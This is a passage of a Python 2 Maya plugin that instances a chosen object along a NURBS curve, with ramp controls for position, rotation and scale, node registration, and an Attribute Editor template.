self.compound = OpenMaya.MObject()
self.x = OpenMaya.MObject()
self.y = OpenMaya.MObject()
self.z = OpenMaya.MObject()
# Input attributes
inputCurveAttr = OpenMaya.MObject()
inputTransformAttr = OpenMaya.MObject()
inputShadingGroupAttr = OpenMaya.MObject()
# Instance count related attributes
instanceCountAttr = OpenMaya.MObject()
instancingModeAttr = OpenMaya.MObject()
instanceLengthAttr = OpenMaya.MObject()
maxInstancesByLengthAttr = OpenMaya.MObject()
displayTypeAttr = OpenMaya.MObject()
bboxAttr = OpenMaya.MObject()
orientationModeAttr = OpenMaya.MObject()
inputOrientationAxisAttr = Vector3CompoundAttribute()
class RampAttributes(object):
def __init__(self):
self.ramp = OpenMaya.MObject() # normalized ramp
self.rampOffset = OpenMaya.MObject() # evaluation offset for ramp
self.rampAxis = OpenMaya.MObject() # ramp normalized axis
self.rampAmplitude = OpenMaya.MObject() # ramp amplitude
self.rampRandomAmplitude = OpenMaya.MObject() # ramp random amplitude
# Simple container class for compound vector attributes
class RampValueContainer(object):
def __init__(self, mObject, dataBlock, rampAttr, normalize):
self.ramp = OpenMaya.MRampAttribute(OpenMaya.MPlug(mObject, rampAttr.ramp))
self.rampOffset = dataBlock.inputValue(rampAttr.rampOffset).asFloat()
self.rampRandomAmplitude = dataBlock.inputValue(rampAttr.rampRandomAmplitude).asFloat()
self.rampAmplitude = dataBlock.inputValue(rampAttr.rampAmplitude).asFloat()
if normalize:
self.rampAxis = dataBlock.inputValue(rampAttr.rampAxis.compound).asVector().normal()
else:
self.rampAxis = dataBlock.inputValue(rampAttr.rampAxis.compound).asVector()
# Ramp attributes
positionRampAttr = RampAttributes()
rotationRampAttr = RampAttributes()
scaleRampAttr = RampAttributes()
# Output vectors
outputTranslationAttr = Vector3CompoundAttribute()
outputRotationAttr = Vector3CompoundAttribute()
outputScaleAttr = Vector3CompoundAttribute()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
# This method is not being called?
# def __del__(self):
# print "CALLBACK: " + str(callbackId)
# OpenMaya.MNodeMessage.removeCallback(self.callbackId)
# OpenMayaMPx.MPxLocatorNode.__del__(self)
def postConstructor(self):
OpenMaya.MFnDependencyNode(self.thisMObject()).setName("instanceAlongCurveLocatorShape#")
self.callbackId = OpenMaya.MNodeMessage.addAttributeChangedCallback(self.thisMObject(), self.attrChangeCallback)
self.updateInstanceConnections()
# Find original SG to reassign it to instance
def getShadingGroup(self):
inputSGPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputShadingGroupAttr)
sgNode = self.getSingleSourceObjectFromPlug(inputSGPlug)
if sgNode is not None and sgNode.hasFn(OpenMaya.MFn.kSet):
return OpenMaya.MFnSet(sgNode)
return None
def assignShadingGroup(self, fnDagNode):
fnSet = self.getShadingGroup()
if fnSet is not None:
# Easiest, cleanest way seems to be calling MEL.
# sets command handles everything, even nested instanced dag paths
mdgm = OpenMaya.MDGModifier()
mdgm.commandToExecute("sets -e -nw -fe " + fnSet.name() + " " + fnDagNode.name())
mdgm.doIt()
# Helper function to get an array of available logical indices from the sparse array
# TODO: maybe it can be precalculated?
def getAvailableLogicalIndices(self, plug, numIndices):
# Allocate and initialize
outIndices = OpenMaya.MIntArray(numIndices)
indices = OpenMaya.MIntArray(plug.numElements())
plug.getExistingArrayAttributeIndices(indices)
currentAvailableIndex = 0
indicesFound = 0
# Assuming indices are SORTED :)
for i in indices:
connectedPlug = plug.elementByLogicalIndex(i).isConnected()
# Iteratively find available indices in the sparse array
while i > currentAvailableIndex:
outIndices[indicesFound] = currentAvailableIndex
indicesFound += 1
currentAvailableIndex += 1
# Check against this index, add it if it is not connected
if i == currentAvailableIndex and not connectedPlug:
outIndices[indicesFound] = currentAvailableIndex
indicesFound += 1
currentAvailableIndex += 1
if indicesFound == numIndices:
return outIndices
# Fill remaining expected indices
for i in xrange(indicesFound, numIndices):
outIndices[i] = currentAvailableIndex
currentAvailableIndex += 1
return outIndices
def getNodeTransformFn(self):
dagNode = OpenMaya.MFnDagNode(self.thisMObject())
dagPath = OpenMaya.MDagPath()
dagNode.getPath(dagPath)
return OpenMaya.MFnDagNode(dagPath.transform())
def updateInstanceConnections(self):
# If the locator is being instanced, just stop updating its children.
# This is to prevent losing references to the locator instances' children
# If you want to change this locator, prepare the source before instantiating
if OpenMaya.MFnDagNode(self.thisMObject()).isInstanced():
return OpenMaya.kUnknownParameter
# Plugs
outputTranslationPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.outputTranslationAttr.compound)
outputRotationPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.outputRotationAttr.compound)
outputScalePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.outputScaleAttr.compound)
expectedInstanceCount = self.getInstanceCountByMode()
numConnectedElements = outputTranslationPlug.numConnectedElements()
# Only instance if we are missing elements
# TODO: handle mismatches in translation/rotation plug connected elements (user deleted a plug? use connectionBroken method?)
if numConnectedElements < expectedInstanceCount:
inputTransformFn = self.getInputTransformFn()
if inputTransformFn is not None:
transformFn = self.getNodeTransformFn()
newInstancesCount = expectedInstanceCount - numConnectedElements
availableIndices = self.getAvailableLogicalIndices(outputTranslationPlug, newInstancesCount)
displayPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.displayTypeAttr)
LODPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.bboxAttr)
mdgModifier = OpenMaya.MDagModifier()
for i in availableIndices:
# Instance transform
# InstanceLeaf must be set to False to prevent crashes :)
trInstance = inputTransformFn.duplicate(True, False)
instanceFn = OpenMaya.MFnTransform(trInstance)
# Parent new instance
transformFn.addChild(trInstance)
instanceTranslatePlug = instanceFn.findPlug('translate', False)
outputTranslationPlugElement = outputTranslationPlug.elementByLogicalIndex(i)
instanceRotationPlug = instanceFn.findPlug('rotate', False)
outputRotationPlugElement = outputRotationPlug.elementByLogicalIndex(i)
instanceScalePlug = instanceFn.findPlug('scale', False)
outputScalePlugElement = outputScalePlug.elementByLogicalIndex(i)
# Enable drawing overrides
overrideEnabledPlug = instanceFn.findPlug("overrideEnabled", False)
overrideEnabledPlug.setBool(True)
instanceDisplayPlug = instanceFn.findPlug("overrideDisplayType", False)
instanceLODPlug = instanceFn.findPlug("overrideLevelOfDetail", False)
if not outputTranslationPlugElement.isConnected():
mdgModifier.connect(outputTranslationPlugElement, instanceTranslatePlug)
if not outputRotationPlugElement.isConnected():
mdgModifier.connect(outputRotationPlugElement, instanceRotationPlug)
if not outputScalePlugElement.isConnected():
mdgModifier.connect(outputScalePlugElement, instanceScalePlug)
if not instanceDisplayPlug.isConnected():
mdgModifier.connect(displayPlug, instanceDisplayPlug)
if not instanceLODPlug.isConnected():
mdgModifier.connect(LODPlug, instanceLODPlug)
mdgModifier.doIt()
# Finally, assign SG to all children
self.assignShadingGroup(transformFn)
# Remove instances if necessary
elif numConnectedElements > expectedInstanceCount:
connections = OpenMaya.MPlugArray()
toRemove = numConnectedElements - expectedInstanceCount
mdgModifier = OpenMaya.MDGModifier()
for i in xrange(toRemove):
outputTranslationPlugElement = outputTranslationPlug.connectionByPhysicalIndex(numConnectedElements - 1 - i)
outputTranslationPlugElement.connectedTo(connections, False, True)
for c in xrange(connections.length()):
mdgModifier.deleteNode(connections[c].node())
mdgModifier.doIt()
def attrChangeCallback(self, msg, plug, otherPlug, clientData):
incomingDirection = (OpenMaya.MNodeMessage.kIncomingDirection & msg) == OpenMaya.MNodeMessage.kIncomingDirection
attributeSet = (OpenMaya.MNodeMessage.kAttributeSet & msg) == OpenMaya.MNodeMessage.kAttributeSet
isCorrectAttribute = (plug.attribute() == instanceAlongCurveLocator.instanceCountAttr)
isCorrectAttribute = isCorrectAttribute or (plug.attribute() == instanceAlongCurveLocator.instancingModeAttr)
isCorrectAttribute = isCorrectAttribute or (plug.attribute() == instanceAlongCurveLocator.instanceLengthAttr)
isCorrectAttribute = isCorrectAttribute or (plug.attribute() == instanceAlongCurveLocator.maxInstancesByLengthAttr)
isCorrectNode = OpenMaya.MFnDependencyNode(plug.node()).typeName() == kPluginNodeName
try:
if isCorrectNode and isCorrectAttribute and attributeSet and incomingDirection:
self.updateInstanceConnections()
except:
sys.stderr.write('Failed trying to update instances. stack trace: \n')
sys.stderr.write(traceback.format_exc())
def getSingleSourceObjectFromPlug(self, plug):
if plug.isConnected():
# Get connected input plugs
connections = OpenMaya.MPlugArray()
plug.connectedTo(connections, True, False)
# Find input transform
if connections.length() == 1:
return connections[0].node()
return None
def getInputTransformFn(self):
inputTransformPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputTransformAttr)
transform = self.getSingleSourceObjectFromPlug(inputTransformPlug)
# Get Fn from a DAG path to get the world transformations correctly
if transform is not None and transform.hasFn(OpenMaya.MFn.kTransform):
path = OpenMaya.MDagPath()
trFn = OpenMaya.MFnDagNode(transform)
trFn.getPath(path)
return OpenMaya.MFnTransform(path)
return None
def getCurveFn(self):
inputCurvePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputCurveAttr)
curve = self.getSingleSourceObjectFromPlug(inputCurvePlug)
# Get Fn from a DAG path to get the world transformations correctly
if curve is not None:
path = OpenMaya.MDagPath()
trFn = OpenMaya.MFnDagNode(curve)
trFn.getPath(path)
path.extendToShape()
if path.node().hasFn(OpenMaya.MFn.kNurbsCurve):
return OpenMaya.MFnNurbsCurve(path)
return None
# Calculate expected instances by the instancing mode
def getInstanceCountByMode(self):
instancingModePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.instancingModeAttr)
inputCurvePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputCurveAttr)
if inputCurvePlug.isConnected() and instancingModePlug.asInt() == 1:
instanceLengthPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.instanceLengthAttr)
maxInstancesByLengthPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.maxInstancesByLengthAttr)
curveFn = self.getCurveFn()
return min(maxInstancesByLengthPlug.asInt(), int(curveFn.length() / instanceLengthPlug.asFloat()))
instanceCountPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.instanceCountAttr)
return instanceCountPlug.asInt()
def getParamOffset(self):
p = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.distOffsetAttr)
return p.asFloat()
def getRandomizedValue(self, random, randomAmplitude, value):
return (random.random() * 2.0 - 1.0) * randomAmplitude + value
def updateInstancePositions(self, curveFn, dataBlock, count, distOffset ):
point = OpenMaya.MPoint()
curveLength = curveFn.length()
translateArrayHandle = dataBlock.outputArrayValue(instanceAlongCurveLocator.outputTranslationAttr.compound)
# Deterministic random
random.seed(count)
rampValues = instanceAlongCurveLocator.RampValueContainer(self.thisMObject(), dataBlock, instanceAlongCurveLocator.positionRampAttr, False)
# Make sure there are enough handles...
for i in xrange(min(count, translateArrayHandle.elementCount())):
rampValue = self.getRampValueAtPosition(rampValues, i, count)
dist = curveLength * (i / float(count)) + distOffset
#normalize
if( dist > 0.0 ):
while( dist > curveLength ):
dist = dist - curveLength
elif( dist < 0.0 ):
while( dist < 0.0 ):
dist = dist + curveLength
# EP curves **really** dont like param at 0.0 (crashes)
param = max( min( curveFn.findParamFromLength( dist ), curveLength ), 0.001 )
curveFn.getPointAtParam(param, point)
try:
normal = curveFn.normal(param)
tangent = curveFn.tangent(param)
bitangent = (normal ^ tangent)
except:
print 'curveFn normal get error. param:%f/length:%f' % ( param, curveLength )
twistNormal = normal * self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.x
twistBitangent = bitangent * self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.y
twistTangent = tangent * self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.z
point += twistNormal + twistTangent + twistBitangent
translateArrayHandle.jumpToArrayElement(i)
translateHandle = translateArrayHandle.outputValue()
translateHandle.set3Double(point.x, point.y, point.z)
translateArrayHandle.setAllClean()
translateArrayHandle.setClean()
def getRampValueAtPosition(self, rampValues, i, count):
util = OpenMaya.MScriptUtil()
util.createFromDouble(0.0)
valuePtr = util.asFloatPtr()
position = math.fmod((i / float(count)) + rampValues.rampOffset, 1.0)
rampValues.ramp.getValueAtPosition(position, valuePtr)
return util.getFloat(valuePtr)
def updateInstanceScale(self, curveFn, dataBlock, count):
point = OpenMaya.MPoint()
scaleArrayHandle = dataBlock.outputArrayValue(instanceAlongCurveLocator.outputScaleAttr.compound)
# Deterministic random
random.seed(count)
rampValues = instanceAlongCurveLocator.RampValueContainer(self.thisMObject(), dataBlock, instanceAlongCurveLocator.scaleRampAttr, False)
# Make sure there are enough handles...
for i in xrange(min(count, scaleArrayHandle.elementCount())):
rampValue = self.getRampValueAtPosition(rampValues, i, count)
point.x = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.x
point.y = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.y
point.z = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.z
scaleArrayHandle.jumpToArrayElement(i)
scaleHandle = scaleArrayHandle.outputValue()
scaleHandle.set3Double(point.x, point.y, point.z)
scaleArrayHandle.setAllClean()
scaleArrayHandle.setClean()
def updateInstanceRotations(self, curveFn, dataBlock, count, distOffset ):
point = OpenMaya.MPoint()
curveLength = curveFn.length()
rotationArrayHandle = dataBlock.outputArrayValue(instanceAlongCurveLocator.outputRotationAttr.compound)
startOrientation = dataBlock.outputValue(instanceAlongCurveLocator.inputOrientationAxisAttr.compound).asVector().normal()
# Deterministic random
random.seed(count)
rampValues = instanceAlongCurveLocator.RampValueContainer(self.thisMObject(), dataBlock, instanceAlongCurveLocator.rotationRampAttr, True)
rotMode = dataBlock.inputValue(instanceAlongCurveLocator.orientationModeAttr).asInt()
inputTransformPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputTransformAttr)
inputTransformRotation = OpenMaya.MQuaternion()
if inputTransformPlug.isConnected():
self.getInputTransformFn().getRotation(inputTransformRotation, OpenMaya.MSpace.kWorld)
for i in xrange(min(count, rotationArrayHandle.elementCount())):
rampValue = self.getRampValueAtPosition(rampValues, i, count)
dist = curveLength * (i / float(count)) + distOffset
#normalize
if( dist > 0.0 ):
while( dist > curveLength ):
dist = dist - curveLength
elif( dist < 0.0 ):
while( dist < 0.0 ):
dist = dist + curveLength
# EP curves **really** dont like param at 0.0 (crashes)
param = max( min( curveFn.findParamFromLength( dist ), curveLength ), 0.002 )
rot = OpenMaya.MQuaternion()
try:
normal = curveFn.normal(param)
tangent = curveFn.tangent(param)
bitangent = (normal ^ tangent)
except:
print 'curveFn normal get error. param:%f/length:%f' % ( param, curveLength )
if rotMode == 1:
rot = inputTransformRotation; # No realtime preview - use an inputRotation for that?
elif rotMode == 2:
rot = startOrientation.rotateTo(normal)
elif rotMode == 3:
rot = startOrientation.rotateTo(tangent)
elif rotMode == 4:
rot = startOrientation.rotateTo(tangent)
if i % 2 == 1:
rot *= OpenMaya.MQuaternion(3.141592 * .5, tangent)
twistNormal = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.x
twistNormal = OpenMaya.MQuaternion(twistNormal * 0.0174532925, normal) # DegToRad
twistTangent = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.y
twistTangent = OpenMaya.MQuaternion(twistTangent * 0.0174532925, tangent) # DegToRad
twistBitangent = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.z
twistBitangent = OpenMaya.MQuaternion(twistBitangent * 0.0174532925, bitangent) # DegToRad
rot = (rot * twistNormal * twistTangent * twistBitangent).asEulerRotation().asVector()
rotationArrayHandle.jumpToArrayElement(i)
rotationHandle = rotationArrayHandle.outputValue()
rotationHandle.set3Double(rot.x, rot.y, rot.z)
rotationArrayHandle.setAllClean()
rotationArrayHandle.setClean()
def isBounded(self):
return True
def boundingBox(self):
return OpenMaya.MBoundingBox(OpenMaya.MPoint(-1,-1,-1), OpenMaya.MPoint(1,1,1))
def compute(self, plug, dataBlock):
try:
curveDataHandle = dataBlock.inputValue(instanceAlongCurveLocator.inputCurveAttr)
curve = curveDataHandle.asNurbsCurveTransformed()
if not curve.isNull():
curveFn = OpenMaya.MFnNurbsCurve(curve)
instanceCount = self.getInstanceCountByMode()
distOffset = self.getParamOffset()
if plug == instanceAlongCurveLocator.outputTranslationAttr.compound:
self.updateInstancePositions(curveFn, dataBlock, instanceCount, distOffset)
if plug == instanceAlongCurveLocator.outputRotationAttr.compound:
self.updateInstanceRotations(curveFn, dataBlock, instanceCount, distOffset)
if plug == instanceAlongCurveLocator.outputScaleAttr.compound:
self.updateInstanceScale(curveFn, dataBlock, instanceCount)
except:
sys.stderr.write('Failed trying to compute locator. stack trace: \n')
sys.stderr.write(traceback.format_exc())
return OpenMaya.kUnknownParameter
@staticmethod
def nodeCreator():
return OpenMayaMPx.asMPxPtr( instanceAlongCurveLocator() )
@classmethod
def addCompoundVector3Attribute(cls, compoundAttribute, attributeName, unitType, arrayAttr, inputAttr, defaultValue):
unitAttr = OpenMaya.MFnUnitAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
compoundAttribute.x = unitAttr.create(attributeName + "X", attributeName + "X", unitType, defaultValue.x)
unitAttr.setWritable( inputAttr )
cls.addAttribute(compoundAttribute.x)
compoundAttribute.y = unitAttr.create(attributeName + "Y", attributeName + "Y", unitType, defaultValue.y)
unitAttr.setWritable( inputAttr )
cls.addAttribute(compoundAttribute.y)
compoundAttribute.z = unitAttr.create(attributeName + "Z", attributeName + "Z", unitType, defaultValue.z)
unitAttr.setWritable( inputAttr )
cls.addAttribute(compoundAttribute.z)
# Output compound
compoundAttribute.compound = nAttr.create(attributeName, attributeName,
compoundAttribute.x, compoundAttribute.y, compoundAttribute.z)
nAttr.setWritable( inputAttr )
nAttr.setArray( arrayAttr )
nAttr.setUsesArrayDataBuilder( arrayAttr )
nAttr.setDisconnectBehavior(OpenMaya.MFnAttribute.kDelete)
cls.addAttribute(compoundAttribute.compound)
@classmethod
def addRampAttributes(cls, rampAttributes, attributeName, unitType, defaultAxisValue):
unitAttr = OpenMaya.MFnUnitAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
rampAttributes.ramp = OpenMaya.MRampAttribute.createCurveRamp(attributeName + "Ramp", attributeName + "Ramp")
cls.addAttribute(rampAttributes.ramp)
rampAttributes.rampOffset = nAttr.create(attributeName + "RampOffset", attributeName + "RampOffset", OpenMaya.MFnNumericData.kFloat, 0.0)
nAttr.setKeyable( True )
cls.addAttribute( rampAttributes.rampOffset )
rampAttributes.rampAmplitude = nAttr.create(attributeName + "RampAmplitude", attributeName + "RampAmplitude", OpenMaya.MFnNumericData.kFloat, 1.0)
nAttr.setKeyable( True )
cls.addAttribute( rampAttributes.rampAmplitude )
rampAttributes.rampRandomAmplitude = nAttr.create(attributeName + "RampRandomAmplitude", attributeName + "RampRandomAmplitude", OpenMaya.MFnNumericData.kFloat, 0.0)
nAttr.setMin(0.0)
nAttr.setSoftMax(1.0)
nAttr.setKeyable( True )
cls.addAttribute( rampAttributes.rampRandomAmplitude )
cls.addCompoundVector3Attribute(rampAttributes.rampAxis, attributeName + "RampAxis", unitType, False, True, defaultAxisValue)
@staticmethod
def nodeInitializer():
# To make things more readable
node = instanceAlongCurveLocator
nAttr = OpenMaya.MFnNumericAttribute()
msgAttributeFn = OpenMaya.MFnMessageAttribute()
curveAttributeFn = OpenMaya.MFnTypedAttribute()
enumFn = OpenMaya.MFnEnumAttribute()
node.inputTransformAttr = msgAttributeFn.create("inputTransform", "it")
node.addAttribute( node.inputTransformAttr )
node.inputShadingGroupAttr = msgAttributeFn.create("inputShadingGroup", "iSG")
node.addAttribute( node.inputShadingGroupAttr )
# Input curve transform
node.inputCurveAttr = curveAttributeFn.create( 'inputCurve', 'curve', OpenMaya.MFnData.kNurbsCurve)
node.addAttribute( node.inputCurveAttr )
## Input instance count
node.instanceCountAttr = nAttr.create("instanceCount", "iic", OpenMaya.MFnNumericData.kInt, 5)
nAttr.setMin(1)
nAttr.setSoftMax(100)
nAttr.setChannelBox( False )
nAttr.setConnectable( False )
node.addAttribute( node.instanceCountAttr)
## curve parameter start offset
node.distOffsetAttr = nAttr.create("distOffset", "pOffset", OpenMaya.MFnNumericData.kFloat, 0.0)
node.addAttribute( node.distOffsetAttr )
## Max instances when defined by instance length
node.maxInstancesByLengthAttr = nAttr.create("maxInstancesByLength", "mibl", OpenMaya.MFnNumericData.kInt, 50)
nAttr.setMin(0)
nAttr.setSoftMax(200)
nAttr.setChannelBox( False )
nAttr.setConnectable( False )
node.addAttribute( node.maxInstancesByLengthAttr)
# Length between instances
node.instanceLengthAttr = nAttr.create("instanceLength", "ilength", OpenMaya.MFnNumericData.kFloat, 1.0)
nAttr.setMin(0.01)
nAttr.setSoftMax(1.0)
nAttr.setChannelBox( False )
nAttr.setConnectable( False )
node.addAttribute( node.instanceLengthAttr)
# Display override options
node.displayTypeAttr = enumFn.create('instanceDisplayType', 'idt')
enumFn.addField( "Normal", 0 );
enumFn.addField( "Template", 1 );
enumFn.addField( "Reference", 2 );
enumFn.setDefault("Reference")
node.addAttribute( node.displayTypeAttr )
# Enum for selection of instancing mode
node.instancingModeAttr = enumFn.create('instancingMode', 'instancingMode')
enumFn.addField( "Count", 0 );
enumFn.addField( "Distance", 1 );
node.addAttribute( node.instancingModeAttr )
# Enum for selection of orientation mode
node.orientationModeAttr = enumFn.create('orientationMode', 'rotMode')
enumFn.addField( "Identity", 0 );
enumFn.addField( "Copy from Source", 1 );
enumFn.addField( "Normal", 2 );
enumFn.addField( "Tangent", 3 );
enumFn.addField( "Chain", 4 );
enumFn.setDefault("Tangent")
node.addAttribute( node.orientationModeAttr )
node.addCompoundVector3Attribute(node.inputOrientationAxisAttr, "inputOrientationAxis", OpenMaya.MFnUnitAttribute.kDistance, False, True, OpenMaya.MVector(0.0, 0.0, 1.0))
node.bboxAttr = nAttr.create('instanceBoundingBox', 'ibb', OpenMaya.MFnNumericData.kBoolean)
node.addAttribute( node.bboxAttr )
node.addRampAttributes(node.positionRampAttr, "position", OpenMaya.MFnUnitAttribute.kDistance, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addRampAttributes(node.rotationRampAttr, "rotation", OpenMaya.MFnUnitAttribute.kAngle, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addRampAttributes(node.scaleRampAttr, "scale", OpenMaya.MFnUnitAttribute.kDistance, OpenMaya.MVector(1.0, 1.0, 1.0))
# Output attributes
node.addCompoundVector3Attribute(node.outputTranslationAttr, "outputTranslation", OpenMaya.MFnUnitAttribute.kDistance, True, False, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addCompoundVector3Attribute(node.outputRotationAttr, "outputRotation", OpenMaya.MFnUnitAttribute.kAngle, True, False, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addCompoundVector3Attribute(node.outputScaleAttr, "outputScale", OpenMaya.MFnUnitAttribute.kDistance, True, False, OpenMaya.MVector(1.0, 1.0, 1.0))
def rampAttributeAffects(rampAttributes, affectedAttr):
node.attributeAffects( rampAttributes.ramp, affectedAttr)
node.attributeAffects( rampAttributes.rampOffset, affectedAttr)
node.attributeAffects( rampAttributes.rampAmplitude, affectedAttr)
node.attributeAffects( rampAttributes.rampAxis.compound, affectedAttr)
node.attributeAffects( rampAttributes.rampRandomAmplitude, affectedAttr)
# Translation affects
node.attributeAffects( node.inputCurveAttr, node.outputTranslationAttr.compound )
node.attributeAffects( node.instanceCountAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.instanceLengthAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.instancingModeAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.maxInstancesByLengthAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.distOffsetAttr, node.outputTranslationAttr.compound )
rampAttributeAffects(node.positionRampAttr, node.outputTranslationAttr.compound)
# Rotation affects
node.attributeAffects( node.inputCurveAttr, node.outputRotationAttr.compound )
node.attributeAffects( node.instanceCountAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.instanceLengthAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.instancingModeAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.maxInstancesByLengthAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.orientationModeAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.distOffsetAttr, node.outputRotationAttr.compound )
node.attributeAffects( node.inputOrientationAxisAttr.compound, node.outputRotationAttr.compound)
rampAttributeAffects(node.rotationRampAttr, node.outputRotationAttr.compound)
# Scale affects
node.attributeAffects( node.inputCurveAttr, node.outputScaleAttr.compound )
node.attributeAffects( node.instanceCountAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.instanceLengthAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.instancingModeAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.maxInstancesByLengthAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.distOffsetAttr, node.outputScaleAttr.compound )
rampAttributeAffects(node.scaleRampAttr, node.outputScaleAttr.compound)
def initializePlugin( mobject ):
mplugin = OpenMayaMPx.MFnPlugin( mobject )
try:
# Register command
mplugin.registerCommand( kPluginCmdName, instanceAlongCurveCommand.cmdCreator )
if OpenMaya.MGlobal.mayaState() != OpenMaya.MGlobal.kBatch:
mplugin.addMenuItem("Instance Along Curve", "MayaWindow|mainEditMenu", kPluginCmdName, "")
# Register AE template
pm.callbacks(addCallback=loadAETemplateCallback, hook='AETemplateCustomContent', owner=kPluginNodeName)
# Register node
mplugin.registerNode( kPluginNodeName, kPluginNodeId, instanceAlongCurveLocator.nodeCreator,
instanceAlongCurveLocator.nodeInitializer, OpenMayaMPx.MPxNode.kLocatorNode, kPluginNodeClassify )
except:
sys.stderr.write('Failed to register plugin instanceAlongCurve. stack trace: \n')
sys.stderr.write(traceback.format_exc())
raise
def uninitializePlugin( mobject ):
mplugin = OpenMayaMPx.MFnPlugin( mobject )
try:
mplugin.deregisterCommand( kPluginCmdName )
mplugin.deregisterNode( kPluginNodeId )
except:
sys.stderr.write( 'Failed to deregister plugin instanceAlongCurve')
raise
###############
# AE TEMPLATE #
###############
def loadAETemplateCallback(nodeName):
AEinstanceAlongCurveLocatorTemplate(nodeName)
class AEinstanceAlongCurveLocatorTemplate(pm.ui.AETemplate):
def addControl(self, control, label=None, **kwargs):
pm.ui.AETemplate.addControl(self, control, label=label, **kwargs)
def beginLayout(self, name, collapse=True):
pm.ui.AETemplate.beginLayout(self, name, collapse=collapse)
def __init__(self, nodeName):
pm.ui.AETemplate.__init__(self,nodeName)
self.thisNode = None
self.node = pm.PyNode(self.nodeName)
if self.node.type() == kPluginNodeName:
self.beginScrollLayout()
self.beginLayout("Instance Along Curve Settings", collapse=0)
self.addControl("instancingMode", label="Instancing Mode", changeCommand=self.onInstanceModeChanged)
self.addControl("instanceCount", label="Count", changeCommand=self.onInstanceModeChanged)
self.addControl("instanceLength", label="Distance", changeCommand=self.onInstanceModeChanged)
self.addControl("maxInstancesByLength", label="Max Instances", changeCommand=self.onInstanceModeChanged)
self.addControl("distOffset", label="Initial Position Offset", changeCommand=lambda nodeName: self.updateDimming(nodeName, "distOffset"))
self.addSeparator()
self.addControl("orientationMode", label="Orientation Mode", changeCommand=lambda nodeName: self.updateDimming(nodeName, "orientationMode"))
self.addControl("inputOrientationAxis", label="Orientation Axis", changeCommand=lambda nodeName: self.updateDimming(nodeName, "inputOrientationAxis"))
self.addSeparator()
self.addControl("instanceDisplayType", label="Instance Display Type", changeCommand=lambda nodeName: self.updateDimming(nodeName, "instanceDisplayType"))
self.addControl("instanceBoundingBox", label="Use bounding box", changeCommand=lambda nodeName: self.updateDimming(nodeName, "instanceBoundingBox"))
self.addSeparator()
self.addControl("inputTransform", label="Input object", changeCommand=lambda nodeName: self.updateDimming(nodeName, "inputTransform"))
self.addControl("inputShadingGroup", label="Shading Group", changeCommand=lambda nodeName: self.updateDimming(nodeName, "inputShadingGroup"))
def showRampControls(rampName):
self.beginLayout(rampName.capitalize() + " Control", collapse=True)
mel.eval('AEaddRampControl("' + nodeName + "." + rampName + 'Ramp"); ')
self.addControl(rampName + "RampOffset", label= rampName.capitalize() + " Ramp Offset")
self.addControl(rampName + "RampAmplitude", label= rampName.capitalize() + " Ramp Amplitude")
self.addControl(rampName + "RampRandomAmplitude", label= rampName.capitalize() + " Ramp Random")
self.addControl(rampName + "RampAxis", label= rampName.capitalize() + " Ramp Axis")
self.endLayout()
showRampControls("position")
showRampControls("rotation")
showRampControls("scale")
self.addExtraControls()
self.endLayout()
self.endScrollLayout()
def onRampUpdate(self, attr):
pm.gradientControl(attr)
def updateDimming(self, nodeName, attr):
if pm.PyNode(nodeName).type() == kPluginNodeName:
node = pm.PyNode(nodeName)
instanced = node.isInstanced()
hasInputTransform = node.inputTransform.isConnected()
hasInputCurve = node.inputCurve.isConnected()
self.dimControl(nodeName, attr, instanced or (not hasInputCurve) or (not hasInputTransform))
def onInstanceModeChanged(self, nodeName):
self.updateDimming(nodeName, "instancingMode")
if pm.PyNode(nodeName).type() == kPluginNodeName:
